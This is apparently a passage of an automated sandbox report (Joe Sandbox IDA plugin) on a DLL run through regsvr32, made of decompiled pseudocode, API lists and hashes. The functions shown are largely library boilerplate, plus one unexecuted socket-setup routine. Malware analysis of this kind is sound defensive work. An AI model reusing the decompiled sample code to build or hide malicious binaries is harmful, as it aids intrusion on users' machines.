                                                                                                        					_v12 = 0x5f5e100;
                                                                                                        					_v16 = 0;
                                                                                                        					_v20 = _v8;
                                                                                                        					while(1) {
                                                                                                        						__eflags = _v16 - 0x5f5e100;
                                                                                                        						if(__eflags >= 0) {
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						 *_v20 = _v16;
                                                                                                        						_v16 = _v16 + 1;
                                                                                                        						_t32 = _v20 + 1;
                                                                                                        						__eflags = _t32;
                                                                                                        						_v20 = _t32;
                                                                                                        					}
                                                                                                        					_push(_v8); // executed
                                                                                                        					E10016380(_t25, _t33, _t34, __eflags); // executed
                                                                                                        					__eflags = _v16 - _v12;
                                                                                                        					if(_v16 != _v12) {
                                                                                                        						return 3;
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				return 3;
                                                                                                        			}













                                                                                                        0x10008873
                                                                                                        0x1000887a
                                                                                                        0x10008883
                                                                                                        0x1000888a
                                                                                                        0x10008894
                                                                                                        0x100088ab
                                                                                                        0x100088ab
                                                                                                        0x100088b2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100088ba
                                                                                                        0x1000889f
                                                                                                        0x100088a5
                                                                                                        0x100088a5
                                                                                                        0x100088a8
                                                                                                        0x100088a8
                                                                                                        0x100088c1
                                                                                                        0x100088c2
                                                                                                        0x100088cd
                                                                                                        0x100088d0
                                                                                                        0x00000000
                                                                                                        0x100088d6
                                                                                                        0x00000000
                                                                                                        0x100088d2
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 1000886B
                                                                                                          • Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
                                                                                                          • Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
                                                                                                          • Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 501242067-0
                                                                                                        • Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
                                                                                                        • Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
                                                                                                        • Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
                                                                                                        • Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        APIs
                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 100011F1
                                                                                                        • _memset.LIBCMT ref: 10001205
                                                                                                        • htonl.WS2_32(00000000), ref: 1000121B
                                                                                                        • htons.WS2_32(?), ref: 1000122F
                                                                                                        • socket.WS2_32(00000002,00000002,00000000), ref: 10001245
                                                                                                        • bind.WS2_32(?,?,00000010), ref: 1000126A
                                                                                                        • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 100012AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 1003240404-0
                                                                                                        • Opcode ID: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
                                                                                                        • Instruction ID: 88ed1bb05716eef25c8d7e89d15ea7d56457a166ccc4c5acc9453768105f33a4
                                                                                                        • Opcode Fuzzy Hash: 8abc6e71fccd75ffbc511335db1503be54d7970832d8f44548303c29e94ff06c
                                                                                                        • Instruction Fuzzy Hash: 1C215974A01228AFE760DF60CC85BD9B7B4EF49714F1081D8E949AB381CB71A9C2DF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E10008B90(intOrPtr __ecx) {
                                                                                                        				int _v8;
                                                                                                        				int _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				char _v28;
                                                                                                        				signed int _v32;
                                                                                                        				struct HDC__* _v120;
                                                                                                        				char _v124;
                                                                                                        				int _v128;
                                                                                                        				int _v132;
                                                                                                        				int _v136;
                                                                                                        				struct HICON__* _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t37;
                                                                                                        				int _t40;
                                                                                                        				void* _t41;
                                                                                                        				void* _t66;
                                                                                                        				struct tagRECT* _t82;
                                                                                                        				void* _t84;
                                                                                                        				void* _t85;
                                                                                                        				signed int _t86;
                                                                                                        
                                                                                                        				_t37 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v32 = _t37 ^ _t86;
                                                                                                        				_v144 = __ecx;
                                                                                                        				_t40 = IsIconic( *(_v144 + 0x20));
                                                                                                        				_t87 = _t40;
                                                                                                        				if(_t40 == 0) {
                                                                                                        					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
                                                                                                        				} else {
                                                                                                        					_push(_v144);
                                                                                                        					E10013247(_t66,  &_v124, _t84, _t85, _t87);
                                                                                                        					_t88 =  &_v124;
                                                                                                        					if( &_v124 != 0) {
                                                                                                        						_v136 = _v120;
                                                                                                        					} else {
                                                                                                        						_v136 = 0;
                                                                                                        					}
                                                                                                        					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
                                                                                                        					_v128 = GetSystemMetrics(0xb);
                                                                                                        					_v132 = GetSystemMetrics(0xc);
                                                                                                        					_t82 =  &_v28;
                                                                                                        					GetClientRect( *(_v144 + 0x20), _t82);
                                                                                                        					asm("cdq");
                                                                                                        					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
                                                                                                        					asm("cdq");
                                                                                                        					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
                                                                                                        					_v140 =  *((intOrPtr*)(_v144 + 0x188));
                                                                                                        					_t79 = _v8;
                                                                                                        					DrawIcon(_v120, _v12, _v8, _v140);
                                                                                                        					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
                                                                                                        				}
                                                                                                        				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
                                                                                                        			}


























                                                                                                        0x10008b99
                                                                                                        0x10008ba0
                                                                                                        0x10008ba3
                                                                                                        0x10008bb3
                                                                                                        0x10008bb9
                                                                                                        0x10008bbb
                                                                                                        0x10008c94
                                                                                                        0x10008bc1
                                                                                                        0x10008bc7
                                                                                                        0x10008bcb
                                                                                                        0x10008bd3
                                                                                                        0x10008bd5
                                                                                                        0x10008be6
                                                                                                        0x10008bd7
                                                                                                        0x10008bd7
                                                                                                        0x10008bd7
                                                                                                        0x10008c01
                                                                                                        0x10008c0f
                                                                                                        0x10008c1a
                                                                                                        0x10008c1d
                                                                                                        0x10008c2b
                                                                                                        0x10008c3d
                                                                                                        0x10008c42
                                                                                                        0x10008c51
                                                                                                        0x10008c56
                                                                                                        0x10008c65
                                                                                                        0x10008c72
                                                                                                        0x10008c7e
                                                                                                        0x10008c87
                                                                                                        0x10008c87
                                                                                                        0x10008ca6

                                                                                                        APIs
                                                                                                        • IsIconic.USER32(?), ref: 10008BB3
                                                                                                          • Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
                                                                                                          • Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A
                                                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 10008C01
                                                                                                        • GetSystemMetrics.USER32 ref: 10008C09
                                                                                                        • GetSystemMetrics.USER32 ref: 10008C14
                                                                                                        • GetClientRect.USER32 ref: 10008C2B
                                                                                                        • DrawIcon.USER32 ref: 10008C7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1007970657-0
                                                                                                        • Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
                                                                                                        • Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
                                                                                                        • Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
                                                                                                        • Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 73%
                                                                                                        			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v284;
                                                                                                        				char _v288;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t9;
                                                                                                        				intOrPtr* _t18;
                                                                                                        				void* _t26;
                                                                                                        				void* _t27;
                                                                                                        				void* _t33;
                                                                                                        				signed int _t34;
                                                                                                        				void* _t35;
                                                                                                        				signed int _t36;
                                                                                                        				void* _t37;
                                                                                                        
                                                                                                        				_t33 = __edi;
                                                                                                        				_t32 = __edx;
                                                                                                        				_t28 = __ecx;
                                                                                                        				_t26 = __ebx;
                                                                                                        				_t9 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v8 = _t9 ^ _t36;
                                                                                                        				_t39 = _a4 - 0x800;
                                                                                                        				_t35 = __ecx;
                                                                                                        				if(_a4 != 0x800) {
                                                                                                        					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                                                                                                        					if(__eflags != 0) {
                                                                                                        						goto L2;
                                                                                                        					} else {
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
                                                                                                        					E10009BC7(__ebx, _t28, __edi, _t35);
                                                                                                        					_t37 = _t37 + 0x10;
                                                                                                        					L2:
                                                                                                        					_push(_t26);
                                                                                                        					_push(_t33);
                                                                                                        					_t34 =  *(E10017D62(_t39));
                                                                                                        					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
                                                                                                        					_t35 = 0x112;
                                                                                                        					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                                                                        					_t18 = E10017D62(_t39);
                                                                                                        					_t40 =  *_t18;
                                                                                                        					if( *_t18 == 0) {
                                                                                                        						 *(E10017D62(__eflags)) = _t34;
                                                                                                        					} else {
                                                                                                        						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
                                                                                                        					}
                                                                                                        					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                                                                        						_t12 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					} else {
                                                                                                        						_t12 = LoadLibraryA( &_v284);
                                                                                                        					}
                                                                                                        					_pop(_t33);
                                                                                                        					_pop(_t26);
                                                                                                        				}
                                                                                                        				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                        			}

















                                                                                                        0x1000a803
                                                                                                        0x1000a803
                                                                                                        0x1000a803
                                                                                                        0x1000a803
                                                                                                        0x1000a80c
                                                                                                        0x1000a813
                                                                                                        0x1000a816
                                                                                                        0x1000a81e
                                                                                                        0x1000a826
                                                                                                        0x1000a89a
                                                                                                        0x1000a89c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a89e
                                                                                                        0x1000a828
                                                                                                        0x1000a835
                                                                                                        0x1000a836
                                                                                                        0x1000a83b
                                                                                                        0x1000a83e
                                                                                                        0x1000a83e
                                                                                                        0x1000a83f
                                                                                                        0x1000a845
                                                                                                        0x1000a84c
                                                                                                        0x1000a85c
                                                                                                        0x1000a871
                                                                                                        0x1000a873
                                                                                                        0x1000a878
                                                                                                        0x1000a87b
                                                                                                        0x1000a8a5
                                                                                                        0x1000a87d
                                                                                                        0x1000a884
                                                                                                        0x1000a889
                                                                                                        0x1000a8aa
                                                                                                        0x1000a8bf
                                                                                                        0x1000a8bf
                                                                                                        0x1000a8b0
                                                                                                        0x1000a8b7
                                                                                                        0x1000a8b7
                                                                                                        0x1000a8c1
                                                                                                        0x1000a8c2
                                                                                                        0x1000a8c2
                                                                                                        0x1000a8cf

                                                                                                        APIs
                                                                                                        • _strcpy_s.LIBCMT ref: 1000A830
                                                                                                          • Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                          • Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62
                                                                                                        • __snprintf_s.LIBCMT ref: 1000A869
                                                                                                          • Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21
                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1000A8B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                        • String ID: LOC
                                                                                                        • API String ID: 4018564869-519433814
                                                                                                        • Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
                                                                                                        • Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
                                                                                                        • Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
                                                                                                        • Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				void* _v804;
                                                                                                        				intOrPtr _v808;
                                                                                                        				intOrPtr _v812;
                                                                                                        				intOrPtr _t6;
                                                                                                        				intOrPtr _t11;
                                                                                                        				intOrPtr _t12;
                                                                                                        				intOrPtr _t13;
                                                                                                        				long _t17;
                                                                                                        				intOrPtr _t21;
                                                                                                        				intOrPtr _t22;
                                                                                                        				intOrPtr _t25;
                                                                                                        				intOrPtr _t26;
                                                                                                        				intOrPtr _t27;
                                                                                                        				intOrPtr* _t31;
                                                                                                        				void* _t34;
                                                                                                        
                                                                                                        				_t27 = __esi;
                                                                                                        				_t26 = __edi;
                                                                                                        				_t25 = __edx;
                                                                                                        				_t22 = __ecx;
                                                                                                        				_t21 = __ebx;
                                                                                                        				_t6 = __eax;
                                                                                                        				_t34 = _t22 -  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				if(_t34 == 0) {
                                                                                                        					asm("repe ret");
                                                                                                        				}
                                                                                                        				 *0x1005afc0 = _t6;
                                                                                                        				 *0x1005afbc = _t22;
                                                                                                        				 *0x1005afb8 = _t25;
                                                                                                        				 *0x1005afb4 = _t21;
                                                                                                        				 *0x1005afb0 = _t27;
                                                                                                        				 *0x1005afac = _t26;
                                                                                                        				 *0x1005afd8 = ss;
                                                                                                        				 *0x1005afcc = cs;
                                                                                                        				 *0x1005afa8 = ds;
                                                                                                        				 *0x1005afa4 = es;
                                                                                                        				 *0x1005afa0 = fs;
                                                                                                        				 *0x1005af9c = gs;
                                                                                                        				asm("pushfd");
                                                                                                        				_pop( *0x1005afd0);
                                                                                                        				 *0x1005afc4 =  *_t31;
                                                                                                        				 *0x1005afc8 = _v0;
                                                                                                        				 *0x1005afd4 =  &_a4;
                                                                                                        				 *0x1005af10 = 0x10001;
                                                                                                        				_t11 =  *0x1005afc8; // 0x0
                                                                                                        				 *0x1005aec4 = _t11;
                                                                                                        				 *0x1005aeb8 = 0xc0000409;
                                                                                                        				 *0x1005aebc = 1;
                                                                                                        				_t12 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v812 = _t12;
                                                                                                        				_t13 =  *0x10057a0c; // 0x194a0092
                                                                                                        				_v808 = _t13;
                                                                                                        				 *0x1005af08 = IsDebuggerPresent();
                                                                                                        				_push(1);
                                                                                                        				E100227FB(_t14);
                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                        				_t17 = UnhandledExceptionFilter(0x1002b434);
                                                                                                        				if( *0x1005af08 == 0) {
                                                                                                        					_push(1);
                                                                                                        					E100227FB(_t17);
                                                                                                        				}
                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                        			}



















                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167db
                                                                                                        0x100167dd
                                                                                                        0x100167dd
                                                                                                        0x1001c395
                                                                                                        0x1001c39a
                                                                                                        0x1001c3a0
                                                                                                        0x1001c3a6
                                                                                                        0x1001c3ac
                                                                                                        0x1001c3b2
                                                                                                        0x1001c3b8
                                                                                                        0x1001c3bf
                                                                                                        0x1001c3c6
                                                                                                        0x1001c3cd
                                                                                                        0x1001c3d4
                                                                                                        0x1001c3db
                                                                                                        0x1001c3e2
                                                                                                        0x1001c3e3
                                                                                                        0x1001c3ec
                                                                                                        0x1001c3f4
                                                                                                        0x1001c3fc
                                                                                                        0x1001c407
                                                                                                        0x1001c411
                                                                                                        0x1001c416
                                                                                                        0x1001c41b
                                                                                                        0x1001c425
                                                                                                        0x1001c42f
                                                                                                        0x1001c434
                                                                                                        0x1001c43a
                                                                                                        0x1001c43f
                                                                                                        0x1001c44b
                                                                                                        0x1001c450
                                                                                                        0x1001c452
                                                                                                        0x1001c45a
                                                                                                        0x1001c465
                                                                                                        0x1001c472
                                                                                                        0x1001c474
                                                                                                        0x1001c476
                                                                                                        0x1001c47b
                                                                                                        0x1001c48f

                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 1001C445
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
                                                                                                        • UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 1001C488
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2579439406-0
                                                                                                        • Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
                                                                                                        • Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
                                                                                                        • Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
                                                                                                        • Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100126F9(void* __ecx, CHAR* _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				struct HRSRC__* _t8;
                                                                                                        				void* _t9;
                                                                                                        				void* _t11;
                                                                                                        				void* _t14;
                                                                                                        				void* _t15;
                                                                                                        				void* _t16;
                                                                                                        				struct HINSTANCE__* _t17;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t14 = 0;
                                                                                                        				_t11 = 0;
                                                                                                        				_t19 = _a4;
                                                                                                        				_t18 = __ecx;
                                                                                                        				if(_a4 == 0) {
                                                                                                        					L4:
                                                                                                        					_t16 = E100122B0(_t11, _t18, _t11);
                                                                                                        					if(_t11 != 0 && _t14 != 0) {
                                                                                                        						FreeResource(_t14);
                                                                                                        					}
                                                                                                        					return _t16;
                                                                                                        				}
                                                                                                        				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
                                                                                                        				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                                                                        				if(_t8 == 0) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				_t9 = LoadResource(_t17, _t8);
                                                                                                        				_t14 = _t9;
                                                                                                        				if(_t14 != 0) {
                                                                                                        					_t11 = LockResource(_t14);
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				return _t9;
                                                                                                        			}















                                                                                                        0x100126fd
                                                                                                        0x100126ff
                                                                                                        0x10012701
                                                                                                        0x10012705
                                                                                                        0x10012707
                                                                                                        0x1001273c
                                                                                                        0x10012746
                                                                                                        0x10012748
                                                                                                        0x1001274f
                                                                                                        0x1001274f
                                                                                                        0x00000000
                                                                                                        0x10012755
                                                                                                        0x1001270e
                                                                                                        0x1001271b
                                                                                                        0x10012723
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10012727
                                                                                                        0x1001272d
                                                                                                        0x10012731
                                                                                                        0x1001273a
                                                                                                        0x00000000
                                                                                                        0x1001273a
                                                                                                        0x1001275b

                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
                                                                                                        • LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
                                                                                                        • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
                                                                                                        • Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
                                                                                                        • Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
                                                                                                        • Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E1000FF59(void* __ecx) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				signed int _t5;
                                                                                                        				void* _t15;
                                                                                                        				void* _t18;
                                                                                                        				void* _t19;
                                                                                                        
                                                                                                        				_t15 = __ecx;
                                                                                                        				if((E10012862(__ecx) & 0x40000000) != 0) {
                                                                                                        					L6:
                                                                                                        					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
                                                                                                        					asm("sbb eax, eax");
                                                                                                        					return  ~( ~_t5);
                                                                                                        				}
                                                                                                        				_t19 = E1000A7CE();
                                                                                                        				if(_t19 == 0) {
                                                                                                        					goto L6;
                                                                                                        				}
                                                                                                        				_t18 = GetKeyState;
                                                                                                        				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                                                                                        					goto L6;
                                                                                                        				} else {
                                                                                                        					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        			}









                                                                                                        0x1000ff5c
                                                                                                        0x1000ff68
                                                                                                        0x1000ffb0
                                                                                                        0x1000ffb2
                                                                                                        0x1000ffb9
                                                                                                        0x00000000
                                                                                                        0x1000ffbb
                                                                                                        0x1000ff6f
                                                                                                        0x1000ff73
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ff75
                                                                                                        0x1000ff82
                                                                                                        0x00000000
                                                                                                        0x1000ff96
                                                                                                        0x1000ffa5
                                                                                                        0x00000000
                                                                                                        0x1000ffad

                                                                                                        APIs
                                                                                                          • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                        • GetKeyState.USER32(00000010), ref: 1000FF7D
                                                                                                        • GetKeyState.USER32(00000011), ref: 1000FF86
                                                                                                        • GetKeyState.USER32(00000012), ref: 1000FF8F
                                                                                                        • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 1000FFA5
                                                                                                        Memory Dump Source
